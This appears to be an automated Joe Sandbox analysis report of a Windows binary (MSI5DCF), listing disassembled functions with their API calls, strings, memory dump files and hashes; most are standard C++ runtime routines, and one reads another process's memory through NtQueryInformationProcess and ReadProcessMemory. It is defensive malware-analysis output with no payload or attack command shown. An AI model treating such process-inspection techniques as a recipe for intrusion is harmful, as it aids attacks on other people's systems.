                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00ADF39E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name$false$true
                                                                        • API String ID: 975656625-1062449267
                                                                        • Opcode ID: e5ac86120a967ff1898b8b9ac9c9134456ba5427d2583abb23ca443b46f32c99
                                                                        • Instruction ID: 2e0882cdddb358f7dddb6c006ca2fa5f89cb37d4309b603c18633c9e8233d621
                                                                        • Opcode Fuzzy Hash: e5ac86120a967ff1898b8b9ac9c9134456ba5427d2583abb23ca443b46f32c99
                                                                        • Instruction Fuzzy Hash: B5B1A2B1D00388DEEB20DFA5C945BDEBBF4BF14304F1481AAE459AB381E7759A48CB51
                                                                        Function 00AD6A60 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,B7207CF4,?,00000000), ref: 00AD6AC2
                                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000,?,B7207CF4,?,00000000), ref: 00AD6AE3
                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,B7207CF4,?,00000000), ref: 00AD6B16
                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,B7207CF4,?,00000000), ref: 00AD6B27
                                                                        • CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6B45
                                                                        • CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6B61
                                                                        • CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6B89
                                                                        • CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6BA5
                                                                        • CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6BC3
                                                                        • CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6BDF
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle$Process$OpenTimes
                                                                        • String ID:
                                                                        • API String ID: 1711917922-0
                                                                        • Opcode ID: 888223c1e89b9ca1996809db1504b151451d48b9a28422d253507a65ac074d7c
                                                                        • Instruction ID: 965cd6be9cf521e2023e3d157966113aa04c91c7af747c4264a2de28c3bbfa49
                                                                        • Opcode Fuzzy Hash: 888223c1e89b9ca1996809db1504b151451d48b9a28422d253507a65ac074d7c
                                                                        • Instruction Fuzzy Hash: E8514B71D01218ABDB14CF98D984BEEFBF5AB48724F20825AE519B7390C7745D05CBA8
                                                                        Function 00AF0834 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF083B
                                                                          • Part of subcall function 00AE780A: __EH_prolog3.LIBCMT ref: 00AE7811
                                                                          • Part of subcall function 00AE780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AE781B
                                                                          • Part of subcall function 00AE780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE788C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1538362411-2891247106
                                                                        • Opcode ID: c71a2a0d0d52cde304d9611280db95ceba89bf8367f6df117e24ba36201359e3
                                                                        • Instruction ID: 65531203a239f0b215dcf4babe518760b8a4e025b6359f79eff1db28d0513244
                                                                        • Opcode Fuzzy Hash: c71a2a0d0d52cde304d9611280db95ceba89bf8367f6df117e24ba36201359e3
                                                                        • Instruction Fuzzy Hash: 22C16D7254020EAFDF18DFE8C9A5DFA7BB8AB19344F144559FB42E7252E670DA00CB60
                                                                        Function 00AF59E2 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF59E9
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5BD
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5E0
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC608
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC6A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1383202999-2891247106
                                                                        • Opcode ID: 4eedbf421449620a879746e6e0cf42a8d7637bc3108eddb15361dd667f811586
                                                                        • Instruction ID: 8609f683fbcce2a668c56afb0baf08715cf200202922b71cd527b845c675a648
                                                                        • Opcode Fuzzy Hash: 4eedbf421449620a879746e6e0cf42a8d7637bc3108eddb15361dd667f811586
                                                                        • Instruction Fuzzy Hash: D1C14D7690050DAFDB19DFE8C999DFB7BB8AB09304F14461AFB06A7251E630DA50CB60
                                                                        Function 00AF0C24 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF0C2B
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB52D
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB550
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB578
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1383202999-2891247106
                                                                        • Opcode ID: 2369990d837928dd2bf46ed08c5dda16d68c614acc2b8130e0fd4b76407e32f3
                                                                        • Instruction ID: 7aad531a07df5febb2bf1d4a772f209e311a7e07f4a469e290d68a24796b3a09
                                                                        • Opcode Fuzzy Hash: 2369990d837928dd2bf46ed08c5dda16d68c614acc2b8130e0fd4b76407e32f3
                                                                        • Instruction Fuzzy Hash: FEC14C7650010EAFDF28DFE8C9A5DFF7BB8AB19300F15451AFB46A6252D630DA50CB60
                                                                        Function 00AD65B0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 258libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00AD6090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AD60F4
                                                                          • Part of subcall function 00AD6090: GetLastError.KERNEL32 ref: 00AD6190
                                                                        • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00AD6632
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 00AD668B
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD6712
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD67F6
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00AD686E
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00AD68C9
                                                                        • FreeLibrary.KERNEL32(?,?,00000000), ref: 00AD691E
                                                                        Strings
                                                                        • NtQueryInformationProcess, xrefs: 00AD662C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead$ErrorFreeLast$AddressDirectoryLibraryLocalProcSystem
                                                                        • String ID: NtQueryInformationProcess
                                                                        • API String ID: 253270903-2781105232
                                                                        • Opcode ID: a9ebc29d6e474ec3247605751a5e4f284a0e9c866b1e823d3b15e2f9cf881299
                                                                        • Instruction ID: f67b58c4e99a41743ec4452d987bc0e0b205881349b854a3a64f4e3c9948e47d
                                                                        • Opcode Fuzzy Hash: a9ebc29d6e474ec3247605751a5e4f284a0e9c866b1e823d3b15e2f9cf881299
                                                                        • Instruction Fuzzy Hash: D3B16170D10759DADB20CF64C9587AEBBF0FF48708F10465EE44AA7290D7B9A6C8CB91
                                                                        Function 00AED491 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AED498
                                                                        • _Maklocstr.LIBCPMT ref: 00AED501
                                                                        • _Maklocstr.LIBCPMT ref: 00AED513
                                                                        • _Maklocchr.LIBCPMT ref: 00AED52B
                                                                        • _Maklocchr.LIBCPMT ref: 00AED53B
                                                                        • _Getvals.LIBCPMT ref: 00AED55D
                                                                          • Part of subcall function 00AE708B: _Maklocchr.LIBCPMT ref: 00AE70BA
                                                                          • Part of subcall function 00AE708B: _Maklocchr.LIBCPMT ref: 00AE70D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                        • String ID: false$true
                                                                        • API String ID: 3549167292-2658103896
                                                                        • Opcode ID: be89c98ec3d49c7f749507dffcee9e639b121222953f2d3582f1faf394aea022
                                                                        • Instruction ID: c6d60d66146644e2b7b29a194bc29ceab16ec107ab81623858f3f27b1c563acb
                                                                        • Opcode Fuzzy Hash: be89c98ec3d49c7f749507dffcee9e639b121222953f2d3582f1faf394aea022
                                                                        • Instruction Fuzzy Hash: 81217172D00358AADF15EFE5D946ADE7BB8AF04710F008056B9199F192EA709940CBA1
                                                                        Function 00ADC9C0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 480COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00AE5C66: __EH_prolog3.LIBCMT ref: 00AE5C6D
                                                                          • Part of subcall function 00AE5C66: std::_Lockit::_Lockit.LIBCPMT ref: 00AE5C78
                                                                          • Part of subcall function 00AE5C66: std::locale::_Setgloballocale.LIBCPMT ref: 00AE5C93
                                                                          • Part of subcall function 00AE5C66: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE5CE6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADCA1A
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADCA80
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADCB4F
                                                                          • Part of subcall function 00AE45A7: __EH_prolog3.LIBCMT ref: 00AE45AE
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADCC00
                                                                        • LocalFree.KERNEL32(?,?,?,00B2B6C9,00000000,00B2B6C9), ref: 00ADCD01
                                                                        • __cftoe.LIBCMT ref: 00ADCE5E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$H_prolog3Locinfo::_Lockit::_Lockit::~_$FreeLocalLocinfo_ctorLocinfo_dtorSetgloballocale__cftoestd::locale::_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2085124900-1405518554
                                                                        • Opcode ID: 35a7fb2f0d7db1b7f8511e39f4687530704fa2cbfcdddb330f517129d8ce2155
                                                                        • Instruction ID: d10c11b22afbc8a2b36498847bb341b522473ff3457fca4bcf8c64bc8603d7a8
                                                                        • Opcode Fuzzy Hash: 35a7fb2f0d7db1b7f8511e39f4687530704fa2cbfcdddb330f517129d8ce2155
                                                                        • Instruction Fuzzy Hash: B4128F71D00249DFDF10DFA8C985BAEBBF5EF08314F54416AE856AB381E735AA04CB91
                                                                        Function 00AFB22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00AFB34B
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00AFB459
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00AFB5AB
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00AFB5C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 2751267872-393685449
                                                                        • Opcode ID: ae007ea8b452dd58eedf77551b00db4af0a64da59b462a003df2941824259db9
                                                                        • Instruction ID: e2362095ff389db7d2b9cd421c508504d44f2759c9a3f72f7d42526d31c5c1ef
                                                                        • Opcode Fuzzy Hash: ae007ea8b452dd58eedf77551b00db4af0a64da59b462a003df2941824259db9
                                                                        • Instruction Fuzzy Hash: BDB1897181021DEFCF14DFE4C9819BEBBB5BF14310B14415AFA166B212C735DA61CBA2
                                                                        Function 00AE0260 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 269memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00AE0322
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00AE0367
                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00AE03DE
                                                                        • LocalFree.KERNEL32(?), ref: 00AE041B
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,B7207CF4,B7207CF4,?,?), ref: 00AE0546
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree$___std_exception_copy
                                                                        • String ID: ios_base::failbit set$iostream
                                                                        • API String ID: 2276494016-302468714
                                                                        • Opcode ID: 7947cb2c3e73bd599d48c44309cc1d33030ff3f23874c3723e3ec958366c3233
                                                                        • Instruction ID: 2681f9a274739714facb0f85b31e3406296e8131f42c71659fa918f4a7bc56b2
                                                                        • Opcode Fuzzy Hash: 7947cb2c3e73bd599d48c44309cc1d33030ff3f23874c3723e3ec958366c3233
                                                                        • Instruction Fuzzy Hash: 44A1A3B1D00249DFDB08DFA9D985BAEFBB5FB48310F10825DE915AB391DB709980CB91
                                                                        Function 00ADBA30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000044,B7207CF4,?,00000000), ref: 00ADBA8B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADBAC8
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADBB35
                                                                        • __Getctype.LIBCPMT ref: 00ADBB7E
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADBBF2
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBCAF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3635123611-1405518554
                                                                        • Opcode ID: 81665f490b674860e9af1de934ada27682bae1208884b1f44b795a6bf9a50515
                                                                        • Instruction ID: c3fa5e4e3efc73150d06ca0ebf71bf0fc5debd0f63b0c4101ed56d8aabbe1b71
                                                                        • Opcode Fuzzy Hash: 81665f490b674860e9af1de934ada27682bae1208884b1f44b795a6bf9a50515
                                                                        • Instruction Fuzzy Hash: 3E8193B1D14388DFEB20CFA8CA4579EBBF4BF14314F148199D445AB382EB759A44CB61
                                                                        Function 00ADC220 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 170memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000018,B7207CF4,?,00000000,?,?,?,?,?,?,?,00000000,00B1ABC5,000000FF), ref: 00ADC264
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC29E
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADC302
                                                                        • __Getctype.LIBCPMT ref: 00ADC34B
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADC391
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC445
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3635123611-1405518554
                                                                        • Opcode ID: ddf36345b7e718d9a5cc6863041e5eae4e3693b4a79504a3780d6f65bcff5c90
                                                                        • Instruction ID: 70db40b0f0107cdcf81aea89cb60124e72b657a1795c2eb7d08c376bdc39cc16
                                                                        • Opcode Fuzzy Hash: ddf36345b7e718d9a5cc6863041e5eae4e3693b4a79504a3780d6f65bcff5c90
                                                                        • Instruction Fuzzy Hash: 74618FB0D01288EFEB10DFE8C6497DEBBF4AF15314F148199E455AB381D7B59A08CB51
                                                                        Function 00AF743E Relevance: 12.2, APIs: 8, Instructions: 224COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(?,?), ref: 00AF74C9
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00AF7557
                                                                        • __alloca_probe_16.LIBCMT ref: 00AF7581
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AF75C9
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00AF75E3
                                                                        • __alloca_probe_16.LIBCMT ref: 00AF7609
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AF7646
                                                                        • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00AF7663
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                        • String ID:
                                                                        • API String ID: 3603178046-0
                                                                        • Opcode ID: 598cec2fd1afd996df3bce5f69329612f2eb058bc739864ca5cfb570ff301343
                                                                        • Instruction ID: f9d7fb0bb048cd908fbade603580ab0b2463ec7dd11f25d12d4f653c77af3a59
                                                                        • Opcode Fuzzy Hash: 598cec2fd1afd996df3bce5f69329612f2eb058bc739864ca5cfb570ff301343
                                                                        • Instruction Fuzzy Hash: 9F71807290865EABDF219FE8CC55AFE7BB6AF49354F284025FA05E7150DB35C801CB60
                                                                        Function 00AF6F23 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00ADC6DF,?,00000001,00000000,?,00000000,?,00ADC6DF,?), ref: 00AF6F6C
                                                                        • __alloca_probe_16.LIBCMT ref: 00AF6F98
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00ADC6DF,?,?,00000000,00ADCCD3,0000003F,?), ref: 00AF6FD7
                                                                        • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADC6DF,?,?,00000000,00ADCCD3,0000003F), ref: 00AF6FF4
                                                                        • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00ADC6DF,?,?,00000000,00ADCCD3,0000003F), ref: 00AF7033
                                                                        • __alloca_probe_16.LIBCMT ref: 00AF7050
                                                                        • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADC6DF,?,?,00000000,00ADCCD3,0000003F), ref: 00AF7092
